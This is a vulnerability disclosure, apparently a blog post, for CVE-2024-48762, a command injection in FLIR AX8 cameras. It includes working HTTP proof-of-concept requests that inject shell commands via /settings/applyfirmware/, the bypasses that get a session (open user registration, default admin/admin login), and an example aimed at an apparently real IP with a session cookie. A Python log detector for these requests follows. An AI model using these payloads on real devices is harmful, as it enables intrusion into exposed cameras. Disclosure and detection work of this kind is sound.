CVE-2024-48762

Description

Command injection vulnerability in /usr/www/application/models/settingscamera.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.

Note:

This is a backend vulnerability, so exploiting it requires a valid session cookie. A cookie can be obtained through the unauthorized-access vulnerability that allows arbitrary user registration at /tools/test_login.php?action=register: after registering a new user, the resulting cookie can be used to achieve RCE (Remote Code Execution).

In addition, under normal circumstances the device has a weak-password vulnerability: the default account uses 'admin' as both the username and the password. A cookie can also be obtained this way.

POC

GET /settings/applyfirmware/;id>test123.txt;/false HTTP/1.1
Host: XXXX
Priority: u=0, i
Accept-Encoding: gzip, deflate
Referer: XXXX
Cookie: XXXX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0

For example

  • this cookie must be changed
GET /settings/applyfirmware/;id>test123.txt;/false HTTP/1.1
Host: 222.103.211.89:8004
Priority: u=0, i
Accept-Encoding: gzip, deflate
Referer: http://222.103.211.89:8004/
Cookie: theme=light; distanceUnit=metric; temperatureUnit=celsius; showCameraId=false; clientTimeZoneOffset=-480; clientTimeZoneDST=0; PHPSESSID=fede7f79f208effcb87474d02fe6d53d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Date: Mon, 11 Feb 2002 09:18:49 GMT
Server: lighttpd/1.4.33
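
One way to spot both requests described on this page in web-server access logs (an added example, not code from the original post or from FLIR). It assumes a CLF-style log line with the client IP first and the request line in double quotes; the sample lines and finding labels are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumed log layout: client IP first, request line in double quotes (CLF-style).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3})')
# Characters a shell treats specially; none belong in this URL path.
SHELL_META = re.compile(r"[;|&`$<>(){}\s]")
INJECT_PREFIX = "/settings/applyfirmware/"
REGISTER_PATH = "/tools/test_login.php"

def fully_decode(text, rounds=3):
    """Undo nested percent-encoding so %3B and %253B both become ';'."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(line):
    """Return (client_ip, status, findings) for one log line, or None if it does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    raw_path, _, query = m.group("target").partition("?")
    path = fully_decode(raw_path)
    findings = []
    if path.startswith(INJECT_PREFIX) and SHELL_META.search(path[len(INJECT_PREFIX):]):
        findings.append("shell-metachar-in-applyfirmware-path")
    if path == REGISTER_PATH and "register" in parse_qs(query).get("action", []):
        findings.append("test-login-register")
    return m.group("ip"), int(m.group("status")), findings

# Constructed sample lines (documentation IP ranges), not taken from a real device.
SAMPLE_LOG = [
    '192.0.2.10 cam - [17/Oct/2024:10:00:01 +0000] "GET /tools/test_login.php?action=register HTTP/1.1" 200 64',
    '192.0.2.10 cam - [17/Oct/2024:10:00:05 +0000] "GET /settings/applyfirmware/;id>test123.txt;/false HTTP/1.1" 200 0',
    '192.0.2.10 cam - [17/Oct/2024:10:00:09 +0000] "GET /settings/applyfirmware/%3Bid%3Etest123.txt%3B/false HTTP/1.1" 200 0',
    '198.51.100.7 cam - [17/Oct/2024:10:02:00 +0000] "GET /settings/applyfirmware/firmware.bin/false HTTP/1.1" 200 0',
]

def scan(lines):
    """Return the (ip, status, findings) tuples that carry at least one finding."""
    results = [classify(line) for line in lines]
    return [r for r in results if r and r[2]]

if __name__ == "__main__":
    for ip, status, findings in scan(SAMPLE_LOG):
        print(ip, status, ", ".join(findings))
```

A registration hit followed by a flagged applyfirmware request from the same client matches the chain described in the note above, so correlating findings by IP is a useful next step.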



CVE-2024-48762
https://xu17.top/2024/10/17/CVE-2024-48762/
Author: XU17
Published: October 17, 2024
License: XU17